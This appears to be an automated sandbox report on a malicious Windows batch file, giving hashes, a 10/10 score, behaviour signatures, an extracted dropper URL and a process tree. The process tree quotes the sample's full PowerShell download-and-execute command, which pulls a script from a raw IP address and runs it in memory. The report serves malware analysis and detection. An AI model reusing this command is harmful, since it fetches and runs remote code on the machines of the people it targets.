Analysis

  • max time kernel
    54s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 02:10

General

  • Target

    c378638c5a35bb563b4b36d635451cb9.bat

  • Size

    219B

  • MD5

    8e9d65b141e89c3d651fa89e306b9b0f

  • SHA1

    5e1c4e09823b5c79eb82dc0d3994f7380c6f5d22

  • SHA256

    ebfad7734e6b37d7bf1576bce1883d8f8668cf60a488058efd9b75e598e7076c

  • SHA512

    50d0f6edf1d5a12640d5e826491bc8b6669360b1aae12e7052eab88ecba33c4b87ce39750eb55507276af60ca202dbf726c688d01aad7ce76d7668d26195a834

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/c378638c5a35bb563b4b36d635451cb9

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c378638c5a35bb563b4b36d635451cb9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c378638c5a35bb563b4b36d635451cb9');Invoke-XDMKAXFLNOPB;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1820

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1820-0-0x0000000000000000-mapping.dmp